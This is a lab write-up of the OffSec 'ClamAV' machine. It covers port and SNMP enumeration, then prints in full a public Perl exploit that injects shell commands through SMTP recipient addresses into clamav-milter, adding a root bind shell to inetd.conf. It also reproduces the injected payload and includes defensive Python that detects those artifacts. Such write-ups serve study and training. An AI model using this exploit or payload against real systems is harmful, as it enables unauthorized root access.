OffSec ClamAV challenge

Mailing a plastic explosive

In this challenge I'm going to mail a C4 plastic explosive to the host. When it explodes, it leaves a small hole through which we can enter and interact with a root shell. To be honest, this exploit is one of my favorite ones from now on because it just goes HARD. Sometimes simplicity is the key to success.

Enumerating ports

Well, of course I have to do port scanning before doing anything:

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ nmap -sC -sV -A 192.168.121.42 -T5 -p- -Pn > nmapScan.output
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-29 14:46 EDT
Warning: 192.168.121.42 giving up on port because retransmission cap hit (2).
Stats: 0:03:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 38.21% done; ETC: 14:56 (0:05:38 remaining)
Nmap scan report for 192.168.121.42
Host is up (0.085s latency).
Not shown: 64716 closed tcp ports (reset), 812 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.209], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-title: Ph33r
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux Linux SNMP multiplexer
445/tcp open netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
Aggressive OS guesses: Dell Integrated Remote Access Controller (iDRAC5) (96%), OpenWrt White Russian 0.9 (Linux 2.4.30) (96%), Linux 2.6.28 (95%), Linux 2.6.9 - 2.6.27 (95%), Sony SMP-N200 media player (95%), Linux 2.6.21 (95%), Linux 2.6.5 (95%), Linux 2.6.18 (95%), Tomato 1.28 (Linux 2.6.22) (95%), Asus RT-AC66U router (Linux 2.6) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.14a-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2025-09-29T18:55:42-04:00
|_clock-skew: mean: 5h59m59s, deviation: 2h49m43s, median: 3h59m58s
|_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: share (dangerous)
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 86.32 ms 192.168.45.1
2 86.04 ms 192.168.45.254
3 86.35 ms 192.168.251.1
4 86.39 ms 192.168.121.42

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 557.52 seconds

This gives us SHIT TONS of information. Of course I read the description of the challenge, and it focuses on SMTP exploitation, but I just wanted to do something cool. I started working on SMB. I thought this would be interesting because there is a guest account with dangerous permissions.

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ smbclient -L //192.168.121.42/ -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
ADMIN$ IPC IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------
0XBABE 0xbabe server (Samba 3.0.14a-Debian) brave pig

Workgroup Master
--------- -------
WORKGROUP 0XBABE

This is quite fun. I tried connecting to ADMIN$ and print$ but they’re password protected. The problem with IPC$ is that it doesn’t give me anything interesting to play with, so I had to stop messing with that guy. Don’t pick on weak people.

I wasted some time on SMB enumeration and information gathering in general with various tools like enum4linux, rpcclient, smbclient, etc., but I never saw any progress, to be honest. That's why I decided to go with HTTP (I saw that port later in the nmap scan output XD).

Well, this port was useless too.

Easter eggs are fun but they love to waste time

Alright. I just went to the page, and this was returned in the browser:

01101001 01100110 01111001 01101111 01110101 01100100 01101111 01101110 01110100 01110000 01110111 01101110 01101101 01100101 01110101 01110010 01100001 01101110 00110000 00110000 01100010

The title of the webpage was Ph33r. I went to CyberChef and converted binary to ASCII, and I got the output:

ifyoudontpwnmeuran00b

This means: if you dont pwn me ur a n00b. NOW I HAVE TO PWN IT, or I'll be a noob. It's time to enumerate the SNMP port with nmap:

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ nmap -sU -p161 --script *snmp* 192.168.121.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-29 15:21 EDT
Nmap scan report for 192.168.121.42
Host is up (0.079s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-info:
| enterprise: U.C. Davis, ECE Dept. Tom
| engineIDFormat: unknown
| engineIDData: 9e325869f30c7749
| snmpEngineBoots: 60
|_ snmpEngineTime: 35m00s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Status: up
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| eth0
| IP address: 192.168.121.42 Netmask: 255.255.255.0
| MAC address: 00:50:56:9e:c5:01 (VMware)
| Type: ethernetCsmacd Speed: 100 Mbps
| Status: up
| Traffic stats: 6.52 Mb sent, 6.18 Mb received
| sit0
| MAC address: 00:00:00:00:c5:01 (Xerox)
| Type: tunnel Speed: 0 Kbps
| Status: down
|_ Traffic stats: 0.00 Kb sent, 0.00 Kb received
| snmp-sysdescr: Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
|_ System uptime: 35m2.82s (210282 timeticks)
| snmp-processes:
...
| Name: clamd
| Path: /usr/local/sbin/clamd
| 3778:
| Name: clamav-milter
| Path: /usr/local/sbin/clamav-milter
| Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
| 3787:
| Name: inetd
| Path: /usr/sbin/inetd
| 3791:
| Name: nmbd
| Path: /usr/sbin/nmbd
| Params: -D
| 3793:
| Name: smbd
| Path: /usr/sbin/smbd
| Params: -D
| 3797:
| Name: snmpd
| Path: /usr/sbin/snmpd
| Params: -Lsd -Lf /dev/null -p /var/run/snmpd.pid
| 3798:
| Name: smbd
| Path: /usr/sbin/smbd
| Params: -D
| 3804:
| Name: sshd
| Path: /usr/sbin/sshd
| 3882:
| Name: sendmail-mta
| Path: sendmail: MTA: accepting connections
...
|_ Params: -D
| snmp-netstat:
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:80 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:199 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| TCP 192.168.121.42:445 192.168.45.209:42578
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 1.0.0.127:32841 *:*
| UDP 42.121.168.192:137 *:*
|_ UDP 42.121.168.192:138 *:*
| snmp-brute:
|_ public - Valid credentials
Nmap done: 1 IP address (1 host up) scanned in 41.36 seconds

Of course the output itself was much larger, but I replaced some of the process information with ... to make it shorter and easier to read. According to the description of the challenge, the most interesting processes are going to be clamav-milter and sendmail-mta. I can just look the exploit up with searchsploit to see if there is anything.

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ searchsploit clamav-milter
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution | multiple/remote/4761.pl
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Of course, there is one. I just ran the command:

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ perl /usr/share/exploitdb/exploits/multiple/remote/4761.pl 192.168.121.42

This creates a root bind shell on TCP port 31337. It appends the payload to the /etc/inetd.conf file (the inetd service configuration file) and then restarts the service. After that we're good to go, and I can just connect to the target:

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ ncat 192.168.121.42 31337 -v
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.121.42:31337.
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
whoami
root
cd /root
ls
dbootstrap_settings
install-report.template
proof.txt

There is no need to get a proper prompt because I'm already the root user, and I can just read the flag files and submit the answer to OffSec.

Unpacking the C4 explosive

BEWARE!!! This is done by professionals, and you shouldn’t try this at home. I took the PERL script and analyzed it:

### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";

if ($#ARGV != 0) { print "Give me a host to connect.\n"; exit; }
print "Attacking $ARGV[0]...\n";

# Plain TCP connection to the target's SMTP service
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

# The recipient local parts are what clamav-milter (black-hole mode) hands to a shell
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";

# Echo the server's responses
while (<$sock>) {
    print;
}

# milw0rm.com [2007-12-21]

As you can see, this is sending an email to the server, and the payload is this:

echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf
/etc/init.d/inetd restart

These two commands are run on the server: the first adds an inetd entry that serves /bin/sh as root on port 31337, and the second restarts inetd so the new entry takes effect. This allows me to connect to the server with simple tools like ncat and run OS commands.
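From the defender's side, the two artifacts of this attack are the RCPT TO addresses carrying shell metacharacters and the extra inetd.conf entry serving a shell as root. The following is an added example (not part of the original write-up or the exploit) that checks both against constructed sample data modelled on the exchange above; the session transcript and inetd.conf excerpt are made up for the demo.

```python
import re

# Constructed SMTP session modelled on what the exploit script sends
# (sample data, not a capture from the challenge host).
SAMPLE_SMTP_SESSION = """\
ehlo you
mail from: <>
rcpt to: <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"@localhost>
rcpt to: <nobody+"|/etc/init.d/inetd restart"@localhost>
rcpt to: <alice@localhost>
data
"""

# Constructed /etc/inetd.conf excerpt: one normal entry plus the appended bind shell.
SAMPLE_INETD_CONF = """\
# /etc/inetd.conf: see inetd(8) for further information.
ftp   stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
31337 stream tcp nowait root /bin/sh -i
"""

RCPT_RE = re.compile(r'^\s*rcpt\s+to:\s*<(.*)>\s*$', re.IGNORECASE)
SHELL_META = re.compile(r'[|;`$]')   # characters a shell would interpret


def suspicious_recipients(session: str) -> list[str]:
    """Return RCPT TO addresses whose address text contains shell metacharacters.
    clamav-milter in black-hole mode passed such addresses to a shell, which is
    exactly the injection the write-up's exploit relies on."""
    hits = []
    for line in session.splitlines():
        m = RCPT_RE.match(line)
        if m and SHELL_META.search(m.group(1)):
            hits.append(m.group(1))
    return hits


def shell_services(inetd_conf: str) -> list[tuple[str, str, str]]:
    """Return (service, user, program) for inetd.conf entries whose server
    program is a shell: the persistence the exploit leaves behind."""
    found = []
    for line in inetd_conf.splitlines():
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        # inetd.conf fields: service socket_type proto wait user server_path [args]
        fields = line.split()
        if len(fields) < 6:
            continue
        service, user, program = fields[0], fields[4], fields[5]
        if re.search(r'(^|/)(ba|da)?sh$', program):
            found.append((service, user, program))
    return found
```

Run the two checks over real mail logs and the live /etc/inetd.conf; a shell entry owned by root on a high port, or a recipient containing a pipe, is worth an alert on its own.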

What I don’t understand

Alright. The challenge was great and fun, but I don't understand why there were SMB and SSH services. By the SSH service I don't mean port 22/tcp but port 60000/tcp. Are there other ways to gain a shell on this machine? I tried several methods and techniques, but all of them failed. I even tried buffer overflow attacks but failed.

In my opinion, these services are left to waste the time of the people who are solving the challenge. Let’s be honest. There was absolutely NO need for SMB or even SSH service on port 60000/tcp. I just wasted ~15 minutes enumerating SMB and trying to exploit “weaknesses” that gave nothing in return. Just explain to me why people create CTFs this way…